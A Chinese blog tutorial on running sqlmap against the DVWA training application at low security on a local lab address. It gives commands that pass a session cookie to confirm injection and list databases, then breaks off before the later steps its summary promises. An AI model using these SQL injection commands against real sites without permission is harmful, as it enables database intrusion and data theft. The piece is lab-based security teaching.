Sqlmap 注入DVWA[low]

本文详细介绍了如何利用Sqlmap工具对DVWA进行SQL注入攻击。首先,通过设置cookie参数绕过登录访问注入页面,然后展示了Sqlmap确认URL可注入并探测操作系统、Web服务器及数据库类型。接着,逐步演示了获取数据库名、表名、列名以及数据的过程,揭示了SQL注入的基本步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入
参数:--cookie="you cookie"

伪命令:
sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie"
使用演示:
因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的
sqlmap 
--url=
"192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#"
--cookie=
"security=low; ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365"

回显:

通过sqlmap的回显,可以看出目标站的url是可被注入的,并且给出了操作系统Windows,Web服务器的指纹和使用的数据库指纹

1.获取目标数据库的数据库名


sqlmap参数:--dbs 

sqlmap 
--url="192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#"
--cookie="security=low;
ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365"
--dbs

回显:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值